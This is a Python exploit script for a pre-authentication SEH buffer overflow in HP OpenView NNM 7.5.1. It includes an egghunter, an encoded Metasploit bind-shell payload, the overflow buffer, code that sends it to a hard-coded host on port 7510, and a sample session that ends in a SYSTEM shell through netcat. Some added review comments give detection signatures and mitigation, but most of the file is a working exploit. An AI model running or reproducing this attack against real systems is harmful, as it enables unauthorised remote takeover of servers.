#!/usr/bin/python
################################################################################
# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
# Tested on Windows 2003 Server SP1.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
# [shameless plug]
# This vulnerability was found, analysed and exploited
# as part of a training module in "BackTrack to the Max".
# http://www.offensive-security.com/ilt.php
# [/shameless plug]
################################################################################
# bt 0day# python hp-nnm-ov.py
# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil HTTP request to NNMz, ph33r
# [*] Egghunter working ...
# [*] Check payload results - may take up to a minute.
# bt 0day# nc -v 192.168.1.111 4444
# (muts) [192.168.1.111] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\>whoami
# whoami
# nt authority\system
#
# C:\>
#
################################################################################
# Insane, "We own all those registers, but how the heck do we get EIP" method.
################################################################################
# crash = "T"*1300
#
################################################################################
# Funky, "Lets make the stack happy and pray for EIP" overwrite method.
################################################################################
# Case 1 - Stack not happy:
# crash = "T"*989
#
# Case 2 - Stack happy, we own EIP - blessed by the angels above:
# 0x44442638 - Happy NNM address
# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510"
# 12 bytes of nasty strict alphanum shellcode possibility @EBP
#
################################################################################
# Unknown "wtf, these bytes are expanding" SEH method:
################################################################################
# 0x6d356c6e - POP POP RET somewhere in NNM
# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510"
#
################################################################################
# Final exploit crash SEH method:
################################################################################
# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510"
#
################################################################################
#
# NOTE(review): historical (2007) public exploit for HP OpenView NNM 7.5.1.
# It is Python 2 code (print statements, str buffers) and targets a fixed host.
# The header states the bug is pre-authentication, so the exposed NNM web
# listener (port 7510 below) is the whole attack surface: restricting that
# port to management networks and keeping NNM patched is the mitigation.
# Detection-relevant, all taken from the request built below: a GET whose
# URL host part is ~1100 bytes of 0xEB, a declared Content-Length of 1048580
# with a body only a few hundred bytes long, and the literal 8-byte tag
# "T00WT00W" at the start of the body.

import socket
import os
import sys

print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
print "[*] http://www.offensive-security.com"

# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
# One egg to rule them all.
# The hunter is placed in the URL (see evilcrash); the payload it looks for
# is carried separately in the request body and is prefixed with the tag
# "T00WT00W". The "\A" below is not a Python escape and is kept literally.
egghunter=(
"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J"
"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
"U%521*-1-wD-1-wD-8$GwP")

# 34 NOP bytes followed by "add esp,3"; sits between the egg tag and the
# bind-shell payload in the request body.
alignstack="\x90"*34+"\x83\xc4\x03"

# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Spawned shell dies quickly as a result of a parent thread killing it.
# Best shellcodes are of the "instant" type, such as adduser, etc.
# bindshell = egg tag ("T00WT00W") + alignstack + the encoded Metasploit
# win32_bind payload (listens on TCP 4444, per the header's nc session).
bindshell=("T00WT00W" + alignstack +
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d"
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36"
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57"
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44"
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31"
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a"
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56"
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32"
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56"
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

# 0x6d356c6e POP POP RET somewhere in NNM 7.5.1
# The overflow string that becomes the "host" part of the request URL:
# 1101 x 0xEB filler, 4 pad bytes, then 0x6d356c6e little-endian
# ("\x6e\x6c\x35\x6d") as the SEH overwrite, the egghunter, and a ":7510"
# port suffix. Its sheer length (>1100 bytes of one byte value in a URL host)
# is the easiest thing for a proxy/IDS to flag.
evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510"

# Full HTTP/1.1 request. The declared Content-Length (1048580) is far larger
# than the actual body (bindshell), so the declared/actual mismatch is itself
# a request anomaly worth alerting on.
buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
buffer+="Content-Length: 1048580\r\n\r\n"
buffer+= bindshell

print "[*] Sending evil HTTP request to NNMz, ph33r"

# Target host and NNM web port are hard-coded (the author's lab host from the
# header). A single TCP connection carrying one request, then close.
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.111", 7510))
expl.send(buffer)
expl.close()

print "[*] Egghunter working ..."
print "[*] Check payload results - may take up to a minute."